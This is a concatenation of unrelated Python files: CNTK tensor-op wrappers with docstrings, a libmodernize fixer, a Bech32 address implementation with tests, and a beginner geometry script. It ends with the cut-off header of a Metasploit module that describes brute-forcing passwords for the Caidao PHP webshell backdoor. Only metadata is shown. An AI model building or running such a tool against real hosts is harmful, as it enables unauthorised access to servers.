[array([[ 0.5, 0.5]])]
Args:
x: numpy array or any :class:`cntk.graph.ComputationNode` that outputs a tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Softmax
op = Softmax(x, name=name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
def exp(x, name=None):
"""
Computes the element-wise exponential of `x`:
:math:`exp(x) = {e^x}`
Example:
>>> C.eval(C.exp([0., 1.]))
[array([[ 1. , 2.718282]])]
Args:
x: numpy array or any :class:`cntk.graph.ComputationNode` that outputs a tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Exp
op = Exp(x, name=name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
def log(x, name=None):
"""
Computes the element-wise natural logarithm of `x`:
Example:
>>> C.eval(C.log([1., 2.]))
[array([[ 0. , 0.69314718056]])]
Args:
x: numpy array or any :class:`cntk.graph.ComputationNode` that outputs a tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
Note:
CNTK returns -85.1 for log(x) if `x` is negative or zero. The reason is that
it uses 1e-37 (whose natural logarithm is -85.1) as the smallest float
number for `log`, because this is the only guaranteed precision across
platforms. This will be changed to return `NaN` and `-inf`.
"""
from cntk.ops.cntk2 import Log
op = Log(x, name=name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
def log_plus(left, right, name=None):
"""
Binary function computing :math:`ln({e^{left} + e^{right}})` in an overflow-safe way.
Args:
left: left side tensor
right: right side tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk1 import LogPlus
op = LogPlus(left, right, name=name)
wrap_numpy_arrays(op)
op.rank = max(op.leftMatrix.rank, op.rightMatrix.rank)
return op
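# Hedged usage sketch for log_plus (added illustration, not part of the original docstring).
# Since log_plus(a, b) = ln(e^a + e^b), two zero inputs give ln(2) ~ 0.693147 per element;
# the exact shape of the eval output depends on the runtime, so no output is asserted here.
# >>> C.eval(C.log_plus([0.], [0.]))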
def sqrt(x, name=None):
"""
Computes the element-wise square-root of `x`:
:math:`sqrt(x) = {\sqrt[2]{x}}`
Example:
>>> C.eval(C.sqrt([0., 4.]))
[array([[ 0. , 2.]])]
Args:
x: numpy array or any :class:`cntk.graph.ComputationNode` that outputs a tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
Note:
CNTK returns zero for the sqrt of negative numbers; this will be changed to
return NaN
"""
from cntk.ops.cntk2 import Sqrt
op = Sqrt(x, name=name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
def square(x, name=None):
"""
Computes the element-wise square of `x`:
Example:
>>> C.eval(C.square([1., 10.]))
[array([[ 1. , 100.]])]
Args:
x: numpy array or any :class:`cntk.graph.ComputationNode` that outputs a tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Square
op = Square(x, name=name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
def abs(x, name=None):
"""
Computes the element-wise absolute value of `x`:
:math:`abs(x) = |x|`
Example:
>>> C.eval(C.abs([-1, 1, -2, 3]))
[array([[ 1., 1., 2., 3.]])]
Args:
x: numpy array or any :class:`cntk.graph.ComputationNode` that outputs a tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Abs
op = Abs(x, name=name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
def cond(flag, value_if_true, value_if_false, name=None):
"""
Returns either value_if_true or value_if_false based on the value of flag.
If flag != 0, value_if_true is returned, otherwise value_if_false.
Behaves analogously to numpy.where(...).
Example:
>>> C.eval(C.cond([-10, -1, 0, 0.3, 100], [1, 10, 100, 1000, 10000], [ 2, 20, 200, 2000, 20000]))
[array([[ 1.00000000e+00, 1.00000000e+01, 2.00000000e+02,
1.00000000e+03, 1.00000000e+04]])]
Args:
flag: tensor
value_if_true: tensor
value_if_false: tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk1 import If
op = If(flag, value_if_true, value_if_false, name = name)
wrap_numpy_arrays(op)
op.rank = max(op.cond.rank,op.thenVal.rank,op.elseVal.rank)
return op
################################################################################
# recurrent ops
################################################################################
def future_value(shape, x, time_step=1, default_hidden_activation=0.1, name=None):
"""
This function returns the future value wrt `x`. It is most often used when
creating RNNs. The resulting tensor has the same shape as the input but is
the next logical sample. The `time_step` parameter is the number of steps
to look into the future and is 1 by default. If there is no future value (i.e.
the current sample is the last one in the tensor) then the `default_hidden_activation`
value is returned which is 0.1 by default.
Example:
>>> data = np.array([[1,2,3,4],[5,6,7,8],[9,10,11,12]])
>>> t = C.dynamic_axis(name='t')
>>> x = C.input_numpy([data], dynamic_axis=t)
>>> with C.LocalExecutionContext('future_value') as ctx:
... print(ctx.eval(C.future_value(0, x)))
[array([[ 5. , 6. , 7. , 8. ],
[ 9. , 10. , 11. , 12. ],
[ 0.1, 0.1, 0.1, 0.1]])]
Args:
shape (tuple): dimensions of the input `x`, the shape will be inferred if zero is passed.
x: the tensor (or its name) from which the future value is obtained.
time_step (int): the number of time steps to look into the future (default 1)
default_hidden_activation (number): the default value to use when no future value is available (default 0.1)
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk1 import FutureValue
op = FutureValue(shape, x, time_step, default_hidden_activation, name = name)
wrap_numpy_arrays(op)
op.rank = get_rank(shape)
return op
def past_value(shape, x, time_step=1, default_hidden_activation=0.1, name=None):
"""
This function returns the past value wrt `x`. It is most often used when
creating RNNs. The resulting tensor has the same shape as the input but is
the previous logical sample. The `time_step` parameter is the number of steps
to look into the past and is 1 by default. If there is no past value (i.e.
the current sample is the first one in the tensor) then the `default_hidden_activation`
value is returned which is 0.1 by default.
Example:
>>> data = np.array([[1,2,3,4],[5,6,7,8],[9,10,11,12]])
>>> t = C.dynamic_axis(name='t')
>>> x = C.input_numpy([data], dynamic_axis=t)
>>> with C.LocalExecutionContext('past_value') as ctx:
... print(ctx.eval(C.past_value(0, x)))
[array([[ 0.1, 0.1, 0.1, 0.1],
[ 1. , 2. , 3. , 4. ],
[ 5. , 6. , 7. , 8. ]])]
Args:
shape (tuple): dimensions of the input `x`, the shape will be inferred if zero is passed.
x: the tensor (or its name) from which the past value is obtained
time_step (int): the number of time steps to look into the past (default 1)
default_hidden_activation (number): the default value to use when no past value is available (default 0.1)
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk1 import PastValue
op = PastValue(shape, x, time_step, default_hidden_activation, name = name)
wrap_numpy_arrays(op)
op.rank = get_rank(shape)
return op
################################################################################
# reshaping ops
################################################################################
def reshape(x, shape, name=None):
"""
Reinterprets input samples as having different tensor dimensions.
One dimension may be specified as 0 and will be inferred.
The output tensor has the shape given by 'shape'.
The backward pass propagates the received gradient for the output-shape to the input shape.
Examples:
>>> C.eval(C.reshape([[0,1],[2,3],[4,5]], (2,3)))
[array([[[ 0., 4., 3.],
[ 2., 1., 5.]]])]
Args:
x: tensor to be reshaped
shape (tuple): a tuple defining the resulting shape
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk1 import NewReshape
if not np.isscalar(shape):
# cntk uses column major, thus we reverse the shape
shape = tuple(reversed(shape))
op = NewReshape(x, shape, 0, 0, name = name)
wrap_numpy_arrays(op)
op.rank = get_rank(shape)
return op
def transpose_dimensions(x, axis1, axis2, name=None):
"""
Swaps two axes of the tensor. The output tensor has the same data but with
axis1 and axis2 swapped.
Examples:
>>> C.eval(C.transpose_dimensions([[0,1],[2,3],[4,5]], 1,2))
[array([[[ 0., 4., 3.],
[ 2., 1., 5.]]])]
Args:
x: tensor to be reshaped
axis1 (int): the axis to swap with axis2
axis2 (int): the axis to swap with axis1
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import TransposeDimensions
op = TransposeDimensions(x, axis1, axis2, name = name)
wrap_numpy_arrays(op)
op.rank = op._.rank
#cntk uses column major, thus it will read the indices of data passed from
# python in reverse
op.axis1 = abs(axis1) if axis1<0 else op.rank - axis1
op.axis2 = abs(axis2) if axis2<0 else op.rank - axis2
return op
def slice(x, begin_index, end_index, axis=0, name=None):
'''
Slice the input along an axis.
Examples:
>>> # create 2x3 matrix in a sequence of length 1 in a batch of one sample
>>> data = np.asarray([[[1, 2, -3],
... [4, 5, 6]]])
>>> x = C.input_numpy(data)
>>> # slice index 1 (second) at first axis
>>> C.eval(C.slice(x, 1, 2, 0))
[array([[[ 4., 5., 6.]]])]
>>> # slice index 0 (first) at second axis
>>> C.eval(C.slice(x, 0, 1, 1))
[array([[[ 1.],
[ 4.]]])]
NumPy's way of slicing works, too:
Examples:
>>> C.eval(x[1])
[array([[[ 4., 5., 6.]]])]
>>> C.eval(x[:,:2,:])
[array([[[ 1., 2.],
[ 4., 5.]]])]
Args:
x: input tensor
begin_index (int): the index along axis where the slicing starts
end_index (int): the index along axis where the slicing ends
axis (int or str): axis along which `begin_index` and `end_index` will be used. If axis is of type `str` then the time axis will be used.
name (str): the name of the node in the network
See also:
Indexing in NumPy: http://docs.scipy.org/doc/numpy/reference/arrays.indexing.html
Returns:
:class:`cntk.graph.ComputationNode`
'''
from cntk.ops.cntk2 import Slice
op = Slice(x, begin_index, end_index, axis, name=name)
wrap_numpy_arrays(op)
op.rank = op._.rank
#cntk uses column major, thus it will read the indices of data passed from
# python in reverse
if isinstance(axis, str):
op.axis = -1 # time axis
else:
op.axis = abs(axis) if axis<0 else op.rank - axis
return op
def splice(inputs, axis=0, name=None):
'''
Concatenate the input tensors along an axis.
Examples:
>>> # create 2x2 matrix in a sequence of length 1 in a batch of one sample
>>> data1 = np.asarray([[[1, 2],
... [4, 5]]])
>>> x = C.input_numpy(data1)
>>> # create 3x2 matrix in a sequence of length 1 in a batch of one sample
>>> data2 = np.asarray([[[10, 20],
... [30, 40],
... [50, 60]]])
>>> y = C.input_numpy(data2)
>>> # splice both inputs on axis=0 returns a 5x2 matrix
>>> C.eval(C.splice((x,y), 0))
[array([[[1, 2],
[4, 5],
[10, 20],
[30, 40],
[50, 60]]])]
Args:
inputs (list): tuple of input tensors
axis (int): axis along which the concatenation will be performed
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
'''
from cntk.ops.cntk2 import Splice
op = Splice(inputs, axis, name=name)
wrap_numpy_arrays(op)
op.rank = op._[0].rank
#cntk uses column major, thus it will read the indices of data passed from
# python in reverse
op.axis = abs(axis) if axis<0 else op.rank - axis
# Splice is implemented using BrainScript code that results in nested nodes,
# if it gets tag='output' the file name might differ depending on the execution
# path in BS. Thus we wrap it by Identity to have a fixed name.
return identity(op)
################################################################################
# reduction ops
################################################################################
def reduce_sum(x, axis=0, name=None):
'''
Computes the sum of the input tensor's elements across one axis. If `axis==rank`,
then the sum will be computed over all axes, that is, the output is a scalar,
which is the sum of the tensor's elements.
Examples:
>>> # create 3x2 matrix in a sequence of length 1 in a batch of one sample
>>> data = [[10, 20],[30, 40],[50, 60]]
>>> # reduce over the first axis
>>> C.eval(C.reduce_sum(data, 0))
[array([[[ 90., 120.]]])]
>>> # reduce over the second axis
>>> C.eval(C.reduce_sum(data, 1))
[array([[[ 30.],
[ 70.],
[ 110.]]])]
>>> # reduce over the all axes
>>> C.eval(C.reduce_sum(data, 2))
[array([[ 210.]])]
Args:
x: input tensor
axis (int): axis along which the reduction will be performed
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
'''
from cntk.ops.cntk2 import ReduceSum
op = ReduceSum(x, axis, name=name)
wrap_numpy_arrays(op)
#cntk uses column major, thus it will read the indices of data passed from
# python in reverse
op.axis = abs(axis) if axis<0 else op._[0].rank - axis
op.rank = 0 if op.axis == 0 else op._[0].rank
return op
def reduce_log_sum(inputs, name=None):
'''
Computes the log of the sum of the exponentials (log-sum-exp) of the input
tensor's elements. The output is a scalar.
Examples:
>>> # create 3x2 matrix in a sequence of length 1 in a batch of one sample
>>> data = [[10, 20],[30, 40],[50, 60]]
>>> # reduce over all axes
>>> C.eval(C.reduce_log_sum(data))
[array([[ 60.000046]])]
Args:
inputs: input tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
'''
from cntk.ops.cntk2 import ReduceLogSum
op = ReduceLogSum(inputs, 0, name=name)
wrap_numpy_arrays(op)
#TODO: Once axis != 0 is supported, expose it as argument, and compute the
#rank similar to reduce_sum
op.rank = 0
#reduce_log_sum is implemented using BrainScript code that results in nested nodes,
#We wrap it by Identity to guarantee that the tag 'output' is passed over and with a fixed name.
return identity(op)
################################################################################
# training ops
################################################################################
def dropout(x, name=None):
"""
Computes a new tensor with `dropoutRate` percent of the values set to zero. The values
that are set to zero are randomly chosen. This is commonly used to prevent
overfitting during the training process.
The output tensor has the same shape as `x`, but with `dropoutRate` of the
elements set to zero (dropped out).
Args:
x: source tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Dropout
op = Dropout(x, name = name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
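# Hedged usage sketch for dropout (added illustration). The `dropoutRate` mentioned in the
# docstring is not a parameter of this function, so it is assumed to be configured elsewhere
# (e.g. by the training setup), and the zeroed positions are random, so no output is shown.
# >>> h = C.relu(C.times(x, W))   # x and W are assumed to be previously defined nodes
# >>> h_drop = C.dropout(h)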
################################################################################
# variables_and_parameters ops
################################################################################
def input_numpy(value, alias=None, dynamic_axis='', name=None):
'''
Creates an input node from a list of tensors. The tensors represent one
sample and can have sequences of different lengths.
Example:
>>> C.eval(C.input_numpy(np.ones((3, 2))))
[array([[ 1., 1.]]), array([[ 1., 1.]]), array([[ 1., 1.]])]
Args:
value (list): list of tensors potentially having sequences of different lengths.
alias (str): optional alias to be used when serializing the data into an intermediate file
dynamic_axis (str or output of :func:`cntk.ops.dynamic_axis`): the dynamic axis, if the data contains sequences
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
'''
from .. import utils
if utils.is_tensor(value) or utils.is_tensor_list(value):
value = np.asarray(value)
if dynamic_axis:
cntk_shape = value[0].shape[1:]
else:
cntk_shape = value[0].shape
if len(cntk_shape) == 0:
raise ValueError('value should be an array of input samples')
op = input(cntk_shape, dynamic_axis=dynamic_axis, name=name)
from ..reader import LazyInputReader
op.reader = LazyInputReader(
value,
input_alias=alias,
dynamic_axis=dynamic_axis,
node=op)
return op
else:
raise ValueError('value type is not supported: %s' % type(value))
def input(shape, dynamic_axis='', name=None):
"""
It creates an input node. The graph requires a separate reader that will be
fed to this input.
Args:
shape (tuple): the shape of the input tensor
dynamic_axis (str or output of :func:`cntk.ops.dynamic_axis`): the dynamic axis
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk1 import Input
if not np.isscalar(shape):
# cntk uses column major, thus we reverse the shape
shape = tuple(reversed(shape))
op = Input(shape, dynamicAxis=dynamic_axis, name=name)
op.rank = get_rank(shape)
return op
def sparse_input_numpy(indices, values, shape, alias=None, dynamic_axis='', name=None):
'''
Creates an input node from a sparse input tensors described by a list of indices
and a list of values having a shape. The tensors represent one
sample and can have sequences of different lengths.
Example:
>>> # Creating a dense 2x3 matrix
>>> # [[ 10, 20, 30],
>>> #  [ 40, 50, 60]]
>>> # Note that we need to specify a batch of samples of sequences (all
>>> # having sequence length 1 in this example).
>>> dense = C.input_numpy([[[10,20,30],
...                         [40,50,60]]])
>>> # Creating a sparse array
>>> # [0, 0.1, 0]
>>> sparse = C.sparse_input_numpy(indices=[(1,)], values=[(0.1,)], shape=(3,))
>>> C.eval(C.times(dense, sparse))
[array([[ 2., 5.]])]
>>> # Creating a sparse matrix
>>> # [[0  ],
>>> #  [0.1],
>>> #  [0  ]]
>>> sparse = C.sparse_input_numpy(indices=[(1,)], values=[(0.1,)], shape=(3,1))
>>> C.eval(C.times(dense, sparse))
[array([[[ 2.],
[ 5.]]])]
Args:
indices (list): list (batch) of tuples (indices), which are positions of the values after flattening the tensor with `order='F'`
values (list): list (batch) of tuples of values corresponding to indices
shape (tuple): shape of the input
alias (str): optional alias to be used when serializing the data into an intermediate file
dynamic_axis (str or output of :func:`cntk.ops.dynamic_axis`): the dynamic axis, if the data contains sequences
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
'''
op = sparse_input(shape, dynamic_axis=dynamic_axis, name=name)
from ..reader import LazySparseInputReader
op.reader = LazySparseInputReader(
indices,
values,
shape,
input_alias=alias,
dynamic_axis=dynamic_axis,
node=op)
return op
def sparse_input(shape, dynamic_axis='', name=None):
"""
It creates a sparse input node. The graph requires a separate reader that will be
fed to this input.
Args:
shape (tuple): the shape of the input tensor
dynamic_axis (str or output of :func:`cntk.ops.dynamic_axis`): the dynamic axis
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk1 import SparseInput
if not np.isscalar(shape):
# cntk uses column major, thus we reverse the shape
shape = tuple(reversed(shape))
op = SparseInput(shape, dynamicAxis=dynamic_axis, name=name)
op.rank = get_rank(shape)
return op
def parameter(shape=None, value=None, learning_rate_multiplier=1.0,
init_from_file_path=None, name=None):
"""
It creates a parameter tensor.
Args:
shape (tuple or int, optional): the shape of the input tensor. If not provided, it will be inferred from ``value``.
value (scalar or NumPy array, optional): a scalar initial value that will be replicated for every element in the tensor, or a NumPy array providing the full initial value. If ``None``, the tensor will be initialized with uniform random values.
learning_rate_multiplier (float): set to control the learning rate on this particular node
init_from_file_path (str): the file that contains the initial tensor value. Used only if ``value=None``.
name (str, optional): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from . import cntk1
if value is None:
if shape is None:
raise ValueError('you need to specify at least shape or value')
if shape is not None and not np.isscalar(shape):
# cntk uses column major, thus we reverse the shape
shape = tuple(reversed(shape))
if init_from_file_path:
op = cntk1.ParameterTensor(shape, init='fromFile',
learningRateMultiplier=learning_rate_multiplier,
initFromFilePath=init_from_file_path, name=name)
else:
op = cntk1.ParameterTensor(shape,
learningRateMultiplier=learning_rate_multiplier,
name=name)
op.rank = get_rank(shape)
return op
"""
To be as generic as possible, we
- flatten the data
- initialize a ParameterTensor operator with it
- ensure that the graph does not backprop to it.
- finally reshape it.
"""
from .. import utils
if not (np.isscalar(value) or utils.is_tensor(value)):
raise ValueError('value type is not supported: %s' % type(value))
if isinstance(value, list) or np.isscalar(value):
value = np.asarray(value)
import scipy.sparse
if scipy.sparse.issparse(value):
raise ValueError('only dense data is supported')
param_shape = value.shape if value.shape else (1,)
# cntk uses column major, thus we reverse the shape
param_shape = tuple(reversed(param_shape))
literal_shape = (param_shape[0], np.multiply.reduce(param_shape[1:]))
# cntk expects data in reverse order, thus we transpose first
transposed_val = np.transpose(value)
literal_array = np.reshape(transposed_val, literal_shape, order = 'F')
from io import BytesIO
s = BytesIO()
np.savetxt(s, literal_array, '%.4f')
op = cntk1.ParameterTensor(
dims=param_shape,
learningRateMultiplier=learning_rate_multiplier,
init='fromLiteral',
initFromLiteral=s.getvalue().decode())
op.rank = get_rank(param_shape)
return op
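# Hedged usage sketch for parameter (added illustration; initialization values are
# runtime-dependent, so no outputs are shown):
# >>> W = C.parameter(shape=(3, 2))          # learnable tensor, uniformly random initialization
# >>> b = C.parameter(value=np.zeros(2))     # learnable tensor initialized from a NumPy array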
def constant(value, name=None):
"""
It creates a constant tensor initialized from a numpy array
Args:
value: the tensor constant passed as numpy array
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
op = parameter(value=value, learning_rate_multiplier=0.0, name=name)
return op
def dynamic_axis(name=None):
"""
This function creates a dynamic axis object that can be connected to an input.
For sequence-based inputs, this allows the sequences to be of arbitrary lengths
and therefore allows networks to be setup without the need for padding.
Example:
See Examples/LSTM/seqcla.py for a use of :func:`cntk.ops.dynamic_axis`.
Args:
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import DynamicAxis
op = DynamicAxis(name=name)
op.rank = None
return op
def reconcile_dynamic_axis(data_input, layout_input, name=None):
"""
This function adapts the dynamic axis layout for `data_input` to match that
of `layout_input`. It allows these two tensors to be properly compared using, e.g.
a criterion node.
Example:
See Examples/LSTM/seqcla.py for a use of :func:`cntk.ops.reconcile_dynamic_axis`.
Args:
data_input: the tensor to have its dynamic axis layout adapted
layout_input: the tensor layout to use for adapting `data_input`'s layout
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk1 import ReconcileDynamicAxis
op = ReconcileDynamicAxis(data_input, layout_input, name=name)
op.rank = data_input.rank
return op
################################################################################
# reduction ops
################################################################################
def reduce_max(value, axis=0, name=None):
"""
For axis >= 1 computes the maximum of a tensor along the specified axis. In the result the corresponding axis is dropped, i.e. the rank of the result tensor is smaller than the rank of the input tensor.
If axis == 0 the reduction is taken over all tensor values, and the result is a tensor of rank one with one dimension.
Args:
value: input tensor
axis (int): axis to reduce. For axis==0 the whole tensor is reduced into one value.
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk1 import ReduceMax
op = ReduceMax(value, axis=axis, name=name)
wrap_numpy_arrays(op)
op.axis = abs(axis) if axis<0 else op.z.rank - axis
op.rank = 0 if op.axis == 0 else op.z.rank
return op
def reduce_min(value, axis=0, name=None):
"""
For axis >= 1 computes the minimum of a tensor along the specified axis. In the result the corresponding axis is dropped, i.e. the rank of the result tensor is smaller than the rank of the input tensor.
If axis == 0 the reduction is taken over all tensor values, and the result is a tensor of rank one with one dimension.
Args:
value: input tensor
axis (int): axis to reduce. For axis==0 the whole tensor is reduced into one value.
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk1 import ReduceMin
op = ReduceMin(value, axis=axis, name=name)
wrap_numpy_arrays(op)
op.axis = abs(axis) if axis<0 else op.z.rank - axis
op.rank = 0 if op.axis == 0 else op.z.rank
return op
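# Hedged usage sketch for reduce_max / reduce_min (added illustration; outputs omitted
# because the eval result follows the same column-major conventions as reduce_sum above):
# >>> C.eval(C.reduce_max([[10, 20],[30, 40],[50, 60]], 1))   # maximum along the specified axis
# >>> C.eval(C.reduce_min([[10, 20],[30, 40],[50, 60]], 0))   # minimum over all tensor values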
|
from __future__ import generator_stop
from fissix import fixer_base, fixer_util
import libmodernize
class FixBasestring(fixer_base.BaseFix):
BM_compatible = True
PATTERN = """'basestring'"""
def transform(self, node, results):
libmodernize.touch_import(None, "six", node)
return fixer_util.Name("six.string_types", prefix=node.prefix)
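# Illustrative effect of this fixer (added example; the snippet is assumed, not taken from
# the libmodernize test suite):
#   before:  isinstance(x, basestring)
#   after:   isinstance(x, six.string_types)   # with "import six" added via touch_import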
|
#!/usr/bin/env python3
# Copyright (c) 2017 Pieter Wuille
# Copyright (c) Flo Developers 2013-2021
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Reference implementation for Bech32/Bech32m and segwit addresses."""
import unittest
from enum import Enum
CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"
BECH32_CONST = 1
BECH32M_CONST = 0x2bc830a3
class Encoding(Enum):
"""Enumeration type to list the various supported encodings."""
BECH32 = 1
BECH32M = 2
def bech32_polymod(values):
"""Internal function that computes the Bech32 checksum."""
generator = [0x3b6a57b2, 0x26508e6d, 0x1ea119fa, 0x3d4233dd, 0x2a1462b3]
chk = 1
for value in values:
top = chk >> 25
chk = (chk & 0x1ffffff) << 5 ^ value
for i in range(5):
chk ^= generator[i] if ((top >> i) & 1) else 0
return chk
def bech32_hrp_expand(hrp):
"""Expand the HRP into values for checksum computation."""
return [ord(x) >> 5 for x in hrp] + [0] + [ord(x) & 31 for x in hrp]
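# Worked example (added for illustration): for hrp "bc", ord('b') == 98 and ord('c') == 99,
# so the expansion is [98 >> 5, 99 >> 5, 0, 98 & 31, 99 & 31] == [3, 3, 0, 2, 3].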
def bech32_verify_checksum(hrp, data):
"""Verify a checksum given HRP and converted data characters."""
check = bech32_polymod(bech32_hrp_expand(hrp) + data)
if check == BECH32_CONST:
return Encoding.BECH32
elif check == BECH32M_CONST:
return Encoding.BECH32M
else:
return None
def bech32_create_checksum(encoding, hrp, data):
"""Compute the checksum values given HRP and data."""
values = bech32_hrp_expand(hrp) + data
const = BECH32M_CONST if encoding == Encoding.BECH32M else BECH32_CONST
polymod = bech32_polymod(values + [0, 0, 0, 0, 0, 0]) ^ const
return [(polymod >> 5 * (5 - i)) & 31 for i in range(6)]
def bech32_encode(encoding, hrp, data):
"""Compute a Bech32 or Bech32m string given HRP and data values."""
combined = data + bech32_create_checksum(encoding, hrp, data)
return hrp + '1' + ''.join([CHARSET[d] for d in combined])
def bech32_decode(bech):
"""Validate a Bech32/Bech32m string, and determine HRP and data."""
if ((any(ord(x) < 33 or ord(x) > 126 for x in bech)) or
(bech.lower() != bech and bech.upper() != bech)):
return (None, None, None)
bech = bech.lower()
pos = bech.rfind('1')
if pos < 1 or pos + 7 > len(bech) or len(bech) > 90:
return (None, None, None)
if not all(x in CHARSET for x in bech[pos+1:]):
return (None, None, None)
hrp = bech[:pos]
data = [CHARSET.find(x) for x in bech[pos+1:]]
encoding = bech32_verify_checksum(hrp, data)
if encoding is None:
return (None, None, None)
return (encoding, hrp, data[:-6])
def convertbits(data, frombits, tobits, pad=True):
"""General power-of-2 base conversion."""
acc = 0
bits = 0
ret = []
maxv = (1 << tobits) - 1
max_acc = (1 << (frombits + tobits - 1)) - 1
for value in data:
if value < 0 or (value >> frombits):
return None
acc = ((acc << frombits) | value) & max_acc
bits += frombits
while bits >= tobits:
bits -= tobits
ret.append((acc >> bits) & maxv)
if pad:
if bits:
ret.append((acc << (tobits - bits)) & maxv)
elif bits >= frombits or ((acc << (tobits - bits)) & maxv):
return None
return ret
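# Worked example (added for illustration): convertbits([255], 8, 5) regroups the byte 0xff
# into 5-bit groups: 255 >> 3 == 31, and the remaining 3 bits are zero-padded on the right,
# giving (255 << 2) & 31 == 28, so the result is [31, 28]. 20 bytes (160 bits) regroup into
# exactly 32 five-bit values, which is why witness programs round-trip without padding loss.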
def decode_segwit_address(hrp, addr):
"""Decode a segwit address."""
encoding, hrpgot, data = bech32_decode(addr)
if hrpgot != hrp:
return (None, None)
decoded = convertbits(data[1:], 5, 8, False)
if decoded is None or len(decoded) < 2 or len(decoded) > 40:
return (None, None)
if data[0] > 16:
return (None, None)
if data[0] == 0 and len(decoded) != 20 and len(decoded) != 32:
return (None, None)
if (data[0] == 0 and encoding != Encoding.BECH32) or (data[0] != 0 and encoding != Encoding.BECH32M):
return (None, None)
return (data[0], decoded)
def encode_segwit_address(hrp, witver, witprog):
"""Encode a segwit address."""
encoding = Encoding.BECH32 if witver == 0 else Encoding.BECH32M
ret = bech32_encode(encoding, hrp, [witver] + convertbits(witprog, 8, 5))
if decode_segwit_address(hrp, ret) == (None, None):
return None
return ret
class TestFrameworkScript(unittest.TestCase):
def test_segwit_encode_decode(self):
def test_python_bech32(addr):
hrp = addr[:5]
self.assertEqual(hrp, "flort")
(witver, witprog) = decode_segwit_address(hrp, addr)
self.assertEqual(encode_segwit_address(hrp, witver, witprog), addr)
# P2WPKH
test_python_bech32('flort1qthmht0k2qnh3wy7336z05lu2km7emzfpm3wg46')
# P2WSH
test_python_bech32('flort1qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq3xueyj')
test_python_bech32('flort1qft5p2uhsdcdc3l2ua4ap5qqfg4pjaqlp250x7us7a8qqhrxrxfsqseac85')
# P2TR
test_python_bech32('flort1p0xlxvlhemja6c4dqv22uapctqupfhlxm9h8z3k2e72q4k9hcz7vqc8gma6')
|
# Ethan Tuning 2/6/2015
def sphereSurfaceArea(rad):
pi = 3.14159
surfaceArea = 4 * pi * rad ** 2
return surfaceArea
def sphereVolume(rad2):
pi = 3.14159
volume = (4/3) * pi * rad2 ** 3
return volume
def circleCircumference(rad3):
pi = 3.14159
circumference = 2 * pi * rad3
return circumference
def circleArea(rad4):
pi = 3.14159
area = pi * rad4 ** 2
return area
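# Worked check (added for illustration, using the same pi = 3.14159 approximation):
# for radius 1 the functions above give area ~3.14159, circumference ~6.28318,
# sphere surface area ~12.56636 and sphere volume ~4.18879.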
def radiusInfo(rad5):
print("Surface Area of Sphere of Radius" ,rad5, "is:" ,sphereSurfaceArea(rad5))
print("Volume of Sphere of radius" ,rad5, "is:" ,sphereVolume(rad5))
print("Circumference of circle of radius" ,rad5, "is:" ,circleCircumference(rad5))
print("Area of circle of radius" ,rad5, "is:" ,circleArea(rad5))
return
def radiusInfoUserInput():
rad6 = float(input("Enter a radius:"))
radiusInfo(rad6)
return
def main():
radiusInfo(6.1)
print()
radiusInfo(7.5)
print()
radiusInfo(8)
print()
radiusInfo(11.25)
print()
radiusInfoUserInput()
return
main()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# standard modules
import logging
import sys
import random
import string
import os
# extra modules
dependencies_missing = False
try:
import requests
except ImportError:
dependencies_missing = True
# metasploit python module
from metasploit import module, login_scanner
metadata = {
'name': 'AWDFlagHunter utils: Caidao bruteforce login',
'description': '''
This module attempts to brute-force the Caidao PHP backdoor.\n
Default PASS_FILE is caidao_pass.txt in the current directory.\n
Use the creds command to see the result.\n
The result is logged in MODULE_NAME.success.log with the pattern ( http://ip/caidao.php pass )\n
''',
'authors': [
'dyz'
],
'date': '2020-03-22',
'references': [
],
